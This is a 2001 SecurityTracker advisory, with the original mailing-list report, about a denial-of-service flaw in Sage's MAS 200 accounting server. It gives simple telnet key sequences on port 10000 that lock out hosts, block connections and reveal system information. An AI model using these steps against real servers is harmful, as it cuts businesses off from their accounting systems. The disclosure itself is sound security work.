SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   MAS 200 Vendors:   Sage Software
Sage Software's MAS 200 Accounting Software Lets Remote Users Lock Out Hosts and Lock Out New Connections
SecurityTracker Alert ID:  1002239
SecurityTracker URL:  http://securitytracker.com/id/1002239
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 23 2001
Impact:   Denial of service via network, Disclosure of system information
Exploit Included:  Yes  

Description:   A denial of service vulnerability was reported in Sage Software's MAS 200 client/server accounting product. Remote users can cause user accounts to become locked out and can cause future connections to be blocked.

It is reported that a remote user can connect to the server (on port 10000) using telnet and type CTRL+X ten times to cause the server to lock out that specific IP host.

Another user reported that a different sequence of commands can be used to cause denial of service against version 3.6 running under NT4. A single CTRL+q will reportedly disable the host. A CTRL+o will reportedly return information about the system (including IE, installation path, server memory, listening IP addresses, computer name and process owner). Using the 'arrow' keys may cause the system to not respond to any new connection requests.

Impact:   A remote user can cause an IP host to become locked out by the server and may be able to cause the server to not respond to any new connection requests.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.us.sage.com/mas90/mas90cs/nt/default.asp (Links to External Site)
Cause:   State error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  Bug in MAS90 Accounting Platform remote access?



Greetings, 

Not sure if any previous issues with this application have surfaced
here, but I've run 

Sage Software's MAS 200 is an accounting platform which can be
configured to permit remote access to server-side data over TCP/IP. A
host application listens for connections on the server, and all remote
clients use a workstation app to interface with the host. 

Running a port scanner determined that the MAS 200 host application
listens for connections on port 10000.....

telnet x.x.x.x  port: 10000

Connected...

<enter>

"The host does not support this application"

<control + x> X 10    <enter>

"The host has been disabled"...

exit

telnet x.x.x.x port: 10000

Connected...

<enter>

"The host has been disabled"...

--------------------------------------------------------------

Checking the status of the host app at the server console revealed it
had indeed been switched to 'Disabled' status, and all access to the
server from clients on the LAN and WAN sides thru the client application
had been suspended. Am i missing something here? Or is it way too easy
DOS this software? 






 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC